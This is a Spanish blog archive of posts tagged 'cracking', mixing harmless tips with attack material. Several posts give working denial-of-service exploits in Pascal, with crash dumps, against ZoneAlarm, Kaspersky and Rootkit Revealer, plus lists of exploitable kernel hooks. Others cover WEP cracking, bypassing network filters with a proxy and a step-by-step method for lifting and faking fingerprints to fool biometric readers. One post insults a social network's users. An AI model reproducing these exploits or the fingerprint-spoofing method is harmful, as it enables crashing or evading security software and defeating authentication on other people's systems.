Entradas etiquetadas con “cracking” de Mixelandia

Esta entrada es una traducción al español de la entrada que se encuentra en este blog  que a su vez ha sido modificada de esta otra

Esto solo funciona con windows y en este momento solo se puede Activar com iPod, es decir despues de esto no se pueden hacer llamadas telefonicas aun.

Una compañia ha dejado ver que puede desbloquear los IPhones. Aun no han revelado el costo que esto tendra, pero si el hecho de que tendras licensias, por lo que cada licencia comprada sera un Iphone desbloquedo.

No hace mucho se habian liberado unas instrucciones para desbloquear los iphones de manera manual y con varios chips, el más grande inconveniente con este metodo era el tener que abrir tu iphone nuevo y meterle mano, lo que para muchas personas podria resultar fatal, ya que la mayoria de la gente no solemos soldar o instalar artilugios electronicos.
Hay rumores de que en México la compañia que traera el iphone sera Telcel, lo cual no es de extrañar si tomamos en cuenta que es propiedad del hombre más rico del mundo, el sr Carlos Slim.

Ya solo para terminar les dejo el enlace de esta página en la que podran comprar el software para desbloquear su futuro IPhone.

http://iphonesimfree.com/

Saludos.

Este es uno de los temas con los que de repente la gente llega al blog y creo que es tiempo de decirles claramente como se hace eso o mas bien porque ocurre y como solucionarlo.

Primeramente ¿se ha dañado mi administrador de tareas o es el efecto de algun virus?
No, no se ha dañado tu administrador de tareas y no tampoco es que lo haya afectado un virus, simple y secillamente estas en presencia de una de las "caracteristicas" del administrador de tareas.

ahora ¿cómo le hago para que no se vean los menús o en su caso vuelvan a parecer?
sencillo primero vamos a quitarlos, dando doble click en donde indica el circulito rojo en la siguiente figura:



y como el resultado obtenemos esto:



y ahora para recuperar nuestros menus basta con repetir la opreación, es decir dar doble click en el área marcada de azul en la siguiente pantalla:



y listo tus menus volveran a la normalidad.

Espero y esto les pueda ayudar ;)

Saludos

Cuantas veces has estado en tu trbao o escuela e intentas entrar a un sitio y este esta bloqueado o ha sido prohibido por algun software. Bien esto a nivel administrador de red es fácil de implementar cuando se tiene algun tipo de firewall o proxy transparente, el cual el usuario no sabe que esta usando,y que puede facilmente bloquear ciertos dominios o también algunas direcciones IP e inclusive rangos de estas.
Otra cosa que se puede hacer, pero que es mucho más restrictiva es bloquear el acceso a todas las páginas web, y solo permitir algunas. Si este es tu caso entonces no puedo hacer nada por ti, a menos que supiera exactamente que tienes permitido y que no.

pero si tu caso es el primero en el que solo restringen algunas páginas, entonces vamos por buen camino. Supongamos que te han bloqueado el messenger, y si tratas de usar la dirección del web messenger, o de cualquier otra del mismo tipo, solo te aparece un horrendo mensajito diciendo que la página ha sido bloqueada por el administrador.

Bueno es aquí donde entran los llamados proxys que definiremos a continuación:

En el contexto de las ciencias de la computación, el término proxy hace referencia a un programa o dispositivo que realiza una acción en representación de otro. La finalidad más habitual es la del servidor proxy, que sirve para permitir el acceso a Internet a todos los equipos de una organización cuando sólo se puede disponer de un único equipo conectado, esto es, una única dirección IP.

y una vez que tenemos la wikidefinición ahora daremo una de forma más amigable y que sobre todo es la que vamos usar aquí.

Un proxy tiene como función sevir de ruta alternativa entre un sitio web y tu.
Entendiéndolo de esta manera entonces veamos como funciona de una forma más explicativa.


supongamos que tu te encuentras en la IP 172.16.2.32 de la red de tu empresa y que la IP publica es la 149.32.212.23, bien supongamos que deseas accesar a un servicio que la dirección web es la siguiente http://servicio.com y que la IP de dicho servicio es 153.233.32.63, con eso el Administrador de la red puede bloquear ambos o simplemente bloquear http://servicio.com o la IP.

Ahora supongamos que existe una tercer maquina, la cual tiene la IP 142.25.3.21, la cual tiene instalado un proxy, el cual acepta peticiones en el puerto 80 (que es el default para las paginas web). Ahora lo uni co que tienes que hacer es en vez de teclear http://servicio.con, lo que harás sera entrar ala ip http://142.25.3.21 y una vez ahí meterás la dirección web que deseas visitar. Como tu administrador esta ha bloqueado una ip a la que tu no visitaste o por lo menos no de forma directa, este no se dará cuenta de tu visita a esta.

ahora les dejo esa tercer página la cual sirve de proxy y pueden usar para navegar por todos aquellos lugares que los administradores de redes no quiere que vayas.

http://www.universitylend.info en esta encontraras un pequeño formulario en el que solamente tienes que meter la dirección que quieres visitar y listo.

y para no quedarnos atrás en el lado derecho encontraras un cuadro de texto el cual también te ayudara, puesto que este te redirigirá a un proxy también.

Saludos

La otra vez hice una entrada acerca del aircrack-ptw, el cual te puede desencritar las claves wep de 128 bit en uno o dos minutos, y algunas personas me dijeron que estaba muy técnico, que no le entendieron, pues ahora les dejo un vídeo de como se utiliza este programita, esta en backtrack y desencripta la wep en un minuto.

aquí el link del aircrack-ptw en acción


Este vídeo es muy demostrativo y no debería de generar mucha confusión, más si alguien aun no le entiende bien me dice para tratar de hacer uno yo desde ceros.

Si señores, pues resulta que los que diseñan y mantienen operando metroflog suponen que bloquear el botón derecho es suficiente para evitar que bajes las "Super" fotos que ahí­ se publican, que tienen un alto contenido moral e intelectual.

Pues bien en mi faceta de rompebolas y porque me caga el metro, decidí­ pasarme por el arco del triunfo su "protección" anti robo de fotos.

Primera forma:
entra al estúpido metro de tu elección, navega hasta la pendeja foto que desees y ahora en Internet Explorer 7 vete a opciones de internet, luego en la pestaña de seguridad pulsas el botón que dice nivel personalizado y navegas hacia abajo, hasta encontrar la opción que dice Active Scripting pulsa deshabilitar.




Ya nada mas recarga la púgina y listo puedes usar el botón derecho y descargar la imagen como siempre

nota: al finalizar devuelve el estado original a habilitar, sino no estarú activado el javascript.


Ahora vamos a verlo con FireFox

Al igual que con IE, nos vamos a la foto que buscamos y seleccionamos Herramientas->Opciones...
Luego en la pestaña de contenido, des seleccionamos la opción que dice Activar Java Script




Y ya podemos descargar la imagen, en este caso no es necesario recargar la púgina, ya que Firefox es por mucho mejor que IE.

Ahora veamos otro método, el cual no requiere que modifiques ninguna configuración, simplemente guarda la púgina completa y listo todos los archivos se descargaran, incluyendo las imúgenes.

En FF es Archivo ->Guardar como y selecciona Púgina web Completa.
Ponle el nombre que quieras y también se creara una carpeta con ese nombre, en la cual estarú tu foto
En IE es exactamente lo mismo.


Y por si esto fuera poco aun hay otra opción, la cual consiste en usar la tecla print screen, irse a paint y pegar el contenido del porta papeles.

Adivinen que acaban de hacer, si en efecto copiaron la púgina entera, ya solo recortan su foto y listo.

Aun quedan otras opciones, como modificar el script en tiempo de ejecución, pero es muy freak para que tu usuario de metro flog lo llegues a usar.

Y después de demostrar cómo puedes pirañarse las fotos del el estúpido metrofog, ahora déjame decirte que el hecho de hacer eso no es porque me importe el contenido que hay en ese lugar, sino demostrar como pasarse la estupidez de protección que según ellos colocaron.

Por ultimo quiero expresar mimásgrande repudio a este sitio de Metroflog, el cual encuentro totalmente estúpido y carente de sentido, con contenido tonto y de poco valor para los usuarios de internet, solamente generan spam, con sus fotos que normalmente no dicen nada, no expresan nada relevante, son simplemente idioteces de una mente subdesarrollada, con sueños de llegar a ser alguien en la vida (si lo sé, casi todos los adolecentes estún en esta etapa), pero lo peor del caso es ver que personas profesionistas, o de edad avanzada estún de borregos usando estas redes sociales.

No podemos dejar de lado el tipo de escritura que se usa en esos lugares, los cuales denigran al lenguaje español y en ciertos casos también al inglés, con textos (si es que se les puede decir así­) como este "zta imagn la pongo porqe un amigo me pidio qe pusiera imagenes de las que a el le gustan (goticas) jeje y poes aki sta para qe vea qe si le cumplo... y probablemente ponga mas...
xau le raian chido" que dice esto¿? sinceramente esto esta medio raro.
Por cierto la niña que escribió esto tiene 11 años, lo cual es entendible, pero hay "personas"€ de 20 años omásque escriben de esta forma y pues la verdad es que dan pena.

Ya sinmásy para no andar con pendejadas les dejo esto "Metroflog = a Falta de creatividad para poder generar algo de interés para los demús"

Saludos y no sean maricas, no usen esta mariconada de metroflog

Nunca les ha pasado que llegan a un lugar donde la red es inalámbrica y ustedes traen su laptop y no se pueden conectar debido a que esta protegida por wap o wep. Bien a mi me han tocado algunos casos por el estilo y el problema se acentúa cuando nadie se sabe la clave, es decir tenemos maquinas que están conectadas pero nadie se sabe la calve wep o wap.

Para esos casos hay una herramienta que nos permite ver las claves wep y wap que están almacenadas en una computadora, pero solamente las que guarda por medio de la pantalla de configuración de wl propio windows es decir no funciona si tienes instalado algún otro software que se encargue de gestionar las conexiones inalámbricas.

Este programa se llama WirelessKeyView y en su página aweb dice lo siguiente:

"WirelessKeyView permite reuperar todas las claves de red inalámbrica WEP o WAP que se encuentran almacenadas en tu computadora, guardadas por el servicio de configuración de redes inalámbricas de Windows xp y por el sevicio de Auto configuración de Windows Vista. Esto te permite recuperar de una manera fácil todas tus claves en archivos de texto, html o xml o copiar una clave al porta papeles de windows."



El programa no requiere de ningún tipo de instalación o DLL's adicionales, simplemente extrae el ejecutable en cualquier capeta y ejecutalo. Cuando el programa este corriendo, te debería de mostrar las claves almacenadas en tu computadora.

Otra caracteristica es que te puedes descargar un archivo que sirve para traducir al español la aplicación.

Aqui se las dejo epero ue les sirva tanto como a mi

Descargar

Descargar la traducción (nota requieres bajar tambien el otro archivo)

PandaLabs ha descubierto DreamSystem, un sistema para controlar varias variantes de la

familia de bots DreamSocks. la versión 1.3 de esta herramienta es la ultima que se conoce

y esta siendo vendida en varios foros por alrededor de 750 dollares. Por el dinero pagado

se incluyen actualizaciones gratuitas de nuevas versiones.

La herramienta consta de dos partees, La primera permite a los ciber-delincuentes controlar las maquinas comprometidas, convirtiéndolas en servidores, ingresando una URL en los bots,esto es para que se conecten a ella y comiencen a recibir ordenes. La segunda parte es la parte que permite enviar las ordenes a esas maquinas infectadas. Esta ultima ha sido encontrada en muchos foros, lo cual indica que hay varias botnet controladas por esta herramienta.

Los bots controlados mediante DreamSystem permiten que el atacante las convierta en zombies y también las utilice como servidores. Además también permite que el bot descargue y ejecute cualquier tipo de archivos, incluyendo otros códigos maliciosos.

En los foros donde se ha encontrado esta herramienta, esta se esta utilizando para lanzar ataques de Delegación de Servicio Distribuidos(DDoS por sus siglas en ingles) en contra de Servidores web. Esto puede ser en dos protocolos:UDP y TCP.

Los Ciber-delincuentes usan estos ataques para bloquear los servicios proporcionados por compañías que basan sus servicios en internet, -con las perdidas que esto acarrea-, si no pagan una cantidad para detener el ataque.


Las técnicas utilizadas para distribuir estas variantes de los bots van desde la utilización de exploits para infectar la maquina de usuarios, como Mpack o enviando spam con el bot como contenido.

ahora le traemos a tux formado por puros caracteres ascii

El otro dia posteamos un exploit para KAV y ahora le toco el turno a Zone Alarm, un firewall muy usado por su servidor.
El post original esta en ingles aquí

ZoneAlarm Pro version:7.0.337.000
Driver version:7.0.337.000

Actualmente estamos trabajando con varios antivirus / firewalls y estamos probando la estabilidad de algunos de ellos . Lo cual muestra una muy mala situación. ;)

Todos adoran usar ganchos =), desafortunadamete el nivel de conocimiento de sus desarrolladores de drivers para el kernel deja mucho que desear. Simplemente no saben como manejar los ganchos en la SSDT.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreatePort pobre manejo del gancho, service id 46

NtCreatePort esta ganchada por las fucniones del driver vsdatant.sys.

Prototipo de la Función


NTSYSAPI
NTSTATUS
NTAPI
NtCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);


Aquí estan un pequeño exploit que conduce a un pantallazo azul.
Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.


NtCreatePort(nil, pointer($81234567), 0, 0, 0);


Y aquí esta el analisis de este BSOD

Originally posted by windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd256, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 4

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd256

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
fc65bd48 804df06b 00000000 81234567 00000000 vsdatant+0x33256
fc65bd64 7c90eb94 badb0d00 0012fe10 00000000 nt+0x806b
fc65bd68 badb0d00 0012fe10 00000000 00000000 0x7c90eb94
fc65bd6c 0012fe10 00000000 00000000 00000000 0xbadb0d00
fc65bd70 00000000 00000000 00000000 00000000 0x12fe10


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33256

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Otro exploit con la misma técnica para el mismo firewall.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreateWaitablePort, service id 56

NtCreateWaitablePort es otra función ganchada por el driver.

Function prototype

NTSYSAPI
NTSTATUS
NTAPI
NtCreateWaitablePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);



Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.

NtCreateWaitablePort(nil, pointer($81234567), 0, 0, 0);


Esto lleva inmediatamente a un BSOD


analisis en windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd336, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 5

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd336

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f89ded48 804df06b 00000000 81234567 00000000 vsdatant+0x33336
f89ded64 7c90eb94 badb0d00 0012fe10 f90f5d98 nt+0x806b
f89ded68 badb0d00 0012fe10 f90f5d98 f90f5dcc 0x7c90eb94
f89ded6c 0012fe10 f90f5d98 f90f5dcc 00000000 0xbadb0d00
f89ded70 f90f5d98 f90f5dcc 00000000 00000000 0x12fe10
f89ded74 f90f5dcc 00000000 00000000 00000000 0xf90f5d98
f89ded78 00000000 00000000 00000000 00000000 0xf90f5dcc


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33336

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Estamo seguros que existen otros ganchos codificados de una manera deficiente, mas ya no seguimos probando otros.


Saludos
EP_X0FF/UG North

Por casualidad me tope con este video de trinity hackeando la red electrica de la matrix. En este video se puede observar que usa el sshnuke y que esta dentro de una red privada del tipo 10.0.0.0 lo que nos da un total de 16777216 computadoras. o cual es un desperdicio jaja son muchas maquinas para las pocas que se usan realmente.
pero en fin... esta chido...

Hoy les traigo otro exploit el cual tiene que ver con Rootkit Revealer, es una traducción directa del texto publicado por EP_X0FF en los foros de sysinternals aquí
nota:
Solamente usenlo si realmnente saben lo que hacen...

Rootkit Revelaler (RKR) es un detector de Rookits muy conocido el cual es usado para revelar algunos rootkits de modo usuario así como algunas cuantas cosas del modo kernel.

Puede detectar archivos ocultos haciendo lecturas de modo RAW y usando su propio parser para el sistema de archivos. Puede detectar entradas ocultas en el registro volcando directamente desde el disco por medio de un driver y la función ZwSaveKey y utilizando su propio parser para esto.

Existen varias maneras de sobrepasar completamente a RKR, pero el detector mismo puede ayudarte a sobrepasarlo. Esta vulnerabilidad esta presente en todas las versiones de RKR inclusive en las más antiguas versiones de línea de comando.

El objetivo principal del exploit es usar restricciones del sistema de archivos que también están presentes en RKR. El exploit crea un árbol de 1024 directorios es decir cada uno esta dentro del anterior, y después copia calc.exe (la calculadora de windows) en el último directorio creado con el nombre “test.exe”. Después de crear este exploit cualquier escaneada al disco con RKR será completamente inútil, porque cuando RKR pase por el directorio del exploit este comenzara a mostrar todo los directorios y archivos como "Visible in Windows API, MFT, but not in directory index".

Usando este exploit con las viejas versiones de consolas genera un error de violación de acceso.

El codigo del exploit se muestra a continuación…

Advertencia:

Debido a las raices del Sitema de Archivos y a las restricciones de la Ínterfaz Grafica de Windows no es sencillo eliminar el exploit del disco. Así que no lo uses en una maquina real si no sabes como eliminar el archivo.

var

 i: integer;

 buf: array[0..100000] of wchar;

 buf2: LBuf;

begin

 memzero(@buf, sizeof(buf));

 GetWindowsDirectoryW(buf2, MAX_PATH);

 strcpyW(buf, '\\?\C:\adir');

 CreateDirectoryW(buf, nil);

 for i := 0 to 1023 do

 begin

   strcatW(buf, '\adir');

   CreateDirectoryW(buf, nil);

 end;

 strcatW(buf, '\test.exe');

 strcatW(buf2, '\calc.exe');

 CopyFileW(buf2, buf, false);

end;

Este no es un exploit “puro” debido a que no genera escalación de privilegios. Este se puede clasificar como uno del tipo DoS (Denegación del Servicio).

Para corregir esta vulnerabilidad es necesario modificar RKR para soportar rutas UNC.

Después de que ayer se publicara acerca de la Vulnerabilidad de KAS 7.0 Kaspersky Lab reacciono diciendo que no fueron notificados a tiempo con todo y que la vulnerabilidad tenia un año o mas he aquí lo que Kaspersky respondió hoy

El enlace original en ingles

Un consultor (EP_X0FF), recientemente ha publicado en rootkit.com acerca de una vulnerabilidad en KAV 7.0. Desafortunadamente el autor de este material no se ha apegado a la practica estándar de la industria, de contactar a la empresa desarrolladora antes de divulgar los detalles de la vulnerabilidad. Aunque el autor afirma que todos los intentos de informar a Kaspersky Lab acerca de esta vulnerabilidad, fueron ignorados, este no ha sido el caso: Si hubiéramos sido informados, este hecho hubiera sido resuelto desde mucho tiempo atrás.

Los siguientes productos son vulnerables:

Kaspersky Internet Security 6.0/7.0
Kaspersky Anti-Virus 6.0/7.0
Kaspersky Anti-Virus for Windows Workstations 6.0
Kaspersky Anti-Virus 6.0 for Windows Servers

Estos productos son vulnerables solo cuando se ejecutan en los siguientes SOs:


Windows NT
Windows 2000
Windows 2003 x86
Windows XP x86
Productos corriendo en otros SO de Microsoft no son afectados por este percance.

Esta vulnerabilidad esta clasificada como de bajo riesgo debido a la naturaleza de la misma: El usuario tiene que lanzar el exploit manualmente en su computadora. El resultado de explotar esta vulnerabilidad es un error critico del sistema (BSOD) pero no hay una escalación de privilegios o provee algún control de el equipo en forma remota.

Un parche para esta vulnerabilidad sera lanzado en estos días. El parche se instalara estomáticamente. Daremos mas información cuando se lance el parche.

Seguramente que a los señores de KAV esta información no les cayo muy en gracia pero en fin alguine la tenia que publicar...

Saludos

Esta es una traducción de una entrada que hizo el buen EP_X0FF en los foros de sysinternals
y que pueden leer en ingles aquí

El bien conocido antivirus Kaspersky, desde hace un buen tiempo sufre de un bug muy peligroso, el cual permite tronar el sistema protegido por este antivirus, aun desde la cuenta de invitado.

Todos los intentos de avisar a Kaspersky Lab sobre esta vulnerabilidad han sido ignorados. Este material fue mostrado varios años atras, y en el ultimo verano publicamos un nuevo exploit para Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem. Y despues de este tiempo nada ha cambiado. Aun ahora con la nueva version Kaspersky AV 7.0 este exploit sigue funcionando muy bien.
El objetivo principal de este exploit es hacer una llamda a NtOpenProcess con parametros invalidios. Esta funcion esta intervenida (hooked) por el diver de Kaspersky llamdo klif.sys y la reazon para este intercepción es obia - Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso, esto es muy usado por el malware.

Aqui el prototipo de esta función

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL );


Aquí un pequeño exploit codificado en pascal(funciona para el klif.sys vesion 6.12.10.280 y versiones previas)


var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;

Como podran ver el ultimo parametro es la dirección de la estructura CLIENT_ID, la cual apunta hacia una región aleatoria dentro de la memoria del kernel.
al probar el xploit en una instalación limpia de windows XP , sin KAV -no hay BSOD(Blue Screen Of Death o Pantallazo azul).

Al ejecutarlo en un Windows XP protegido por KAV 7.0 -inmediatamente tenemos un BSOD - PAGE_FAULT_IN_NONPAGED_AREA.

Pero ¿Porque pasa esto? la respuesta es muy sencilla. Supongo que el codigo fuente de el hook en NtOpenProcess es algo como esto:

NTSTATUS NewNtOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
__try
{

if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED;

else return RealNtOpenProcess(ProcessHandle, DesiredAccess,
ObjectAttributes, ClientId);
__except (EXCEPTION_EXECUTE_HANDLER)
{
... stuff here ...
}
}

El gran problema aquí es ClientId->UniqueProcess, ya que ClientId es un PUNTERO a una estructura. El hecho de accesar a una región invalida de memoria produce inmediatamente un PAGE_FAULT_IN_NONPAGED_AREA.


el exploit original fue creado por Ms-Rem y luce así


NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);

Comopodras observar los desarrolladores de KAV han usado un bloque try/except, y parece ser que no saben usar otro tipo de funciones manejadoras de erores.

Esperemos que los desarrolladores de Kaspersky Antivirus descubran el fabuloso programa llamado NtCall y corrigan su bug.


*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

***** Kernel symbols are WRONG. Please fix symbols to do analysis.


MODULE_NAME: klif

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000

FAULTING_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 1

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from f941b39a to f941840c

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4


STACK_COMMAND: kb

FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

SYMBOL_STACK_INDEX: 0

FOLLOWUP_NAME: MachineOwner

IMAGE_NAME: klif.sys

SYMBOL_NAME: klif+1940c

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner

Algunos descubrimientos hechos por UG North muestran que hay otras funciones que tambien estan intervenidas por klif.sis las cuales pueden ser explotadas con ataques similares.

Lista de entradas en la SSDT explotables (Windows XP / KAV 7.0.0.55)

==================================
|[Idx] [nombre de la función] |
==================================
|[41 ] NtCreateKey
|[47 ] NtCreateProcess
|[48 ] NtCreateProcessEx
|[50 ] NtCreateSection
|[52 ] NtCreateSymbolicLinkObject
|[53 ] NtCreateThread
|[65 ] NtDeleteValueKey
|[99 ] NtLoadKey2
|[119] NtOpenKey
|[122] NtOpenProcess
|[125] NtOpenSection
|[177] NtQueryValueKey
==================================
Cualquier llamada a esas funciones con parametros invalidos, llevara a un BSOD.

Este tipo de exploit fue descubierto por Ms-Rem en el 2005 y funciona para KAV 5.0

Como se mostro este exploit funciona para todas la versiones de Kaspersky Antivirus incluyendo la nueva versión 7.0.

¿Realmente aun crees quie estas portegido?

Aquí a quedado otra historia más de Internet Explorer y su servidor, en la cual esta vez gane....

Un saludo

Navegando por la red me tope con este método para copiar huellas digitales y engañar a los aparatitos que las leen.

articulo original en ingles aquí

Para poder crear huellas digitales falsas, primeramente necesitamos una original. Recordemos que las huellas digitales no son otra cosa sino que sudor y grasa sobre los objetos tocados. Para obtener la huella digital de alguien más (en este caso la huella digital que quieres copiar) uno debe de basarse en las técnicas forenses que han demostrado ser muy efectivas.
En la figura 1 podemos ver una huella digital.

(Figura 1) residuos grasosos de una huella digital.




Una buena fuente para obtener las huellas digitales son los vasos, las chapas de las puertas y el papel brilloso. El método forense estándar que las hace visibles es el siguiente: Espolvorearlo con talco coloreado, el cual se pega a la grasa (figura 2).



Figure 2: Visualización con polvo de grafito

Otra solución envuelve al cianocrilato, el ingrediente principal de la cola loca. Se coloca una pequeña cantidad en el fondo una tapa de refresco, la cual se coloca sobre la huella (Figura 3).


Figure 3: Visualización con súper pegamento



Los gases de Cianocrilato reaccionan con la grasa, generando una substancia blanca y solida (Figura 4).



Figura 4: la huella después del cianocrilato.



Lo siguiente envuelve escanear/fotografiar (figura 5) y un poco de tratamiento gráfico (Figura 6).



Figura 5: Digitalizando la huella.




Figure 6: retocando la imagen para la impresión.



El objetivo de esto es obtener una imagen de la huella digital, para usarla como molde,
Del cual se hace la copia. La manera más fácil de imprimir la imagen es sobre acetatos, (los que se usan comúnmente para el retroproyector) con una impresora laser. El tóner forma un relieve, el cual es usado de una forma parecida al prensado con letras. El pegamento para madera es adecuado para producir la copia (Figura 7).




Figura 7: pegamento para madera usado para la copia.

Se pude usar una pequeña cantidad de glicerina para mejora la humedad y la usabilidad. Después de mezclar bien, el molde es cubierto por una capa del compuesto (Figuras 8,9)



Figura 8: Cubriendo el molde con el pegamento.



Figura 9: Capa de pegamento sobre la impresión.


Después de que el pegamento ha secado (Figura 10), es retirado y cortado del tamaño del dedo.


Figura 10: Pegamento endurecido



Figura 11: Copia, lista para usarse

Pegamento para teatro es usado para pegar la copia al dedo (Figura 12).


Figura 12: La nueva identidad esta lista.

¡La nueva identidad esta lista!

Esta es una pequeña traducción de un entrevista realizada a los creadores de este ataque.

Lanoa original esta en ingles aquí.
Extracto

WEP esta muerto y aquí la prueba.

Crackear el algoritmo de seguridad para WIFI "WEP" es un juego de probabilidad. el número de paquetes requerido para desencriptar la clave depende de varios factores, incluyendo suerte.

Cuando WEP fue rota en 2001, el ataque necesitaba mas de 5 millones de paquetes para funcionar. Durante el verano de 2004, un hacker llamado KoreK publico un nuevo ataque para WEP llamado Chopper que redujo considerablemente la cantidad de paquetes requeridos, permitiendo que la gente crackeara las llaves, con cientos de miles de paquetes, en vez de millones de estos.

El mes pasado, res investigadores, Erik Tews, Andrei Pychkine y Ralf-Philipp Weinmann
desarrollaron un ataque mas rápido (basándose en el criptoanálisis del RC4 de Andreas Klein),que trabaja con paquetes ARP y que solo necesita 85,000 paquetes para crackear la llave con un 95% de probabilidad. Esto significa obtener la llave en menos de 2 minutos.

pero ¿Cómo funciona el ataque?

Paso1: Encuentra al enemigo (esto es la red de pruebas que creaste en tu laboratorio), solo para verificar los resultados). Puedes usar airodump para encontrarla.

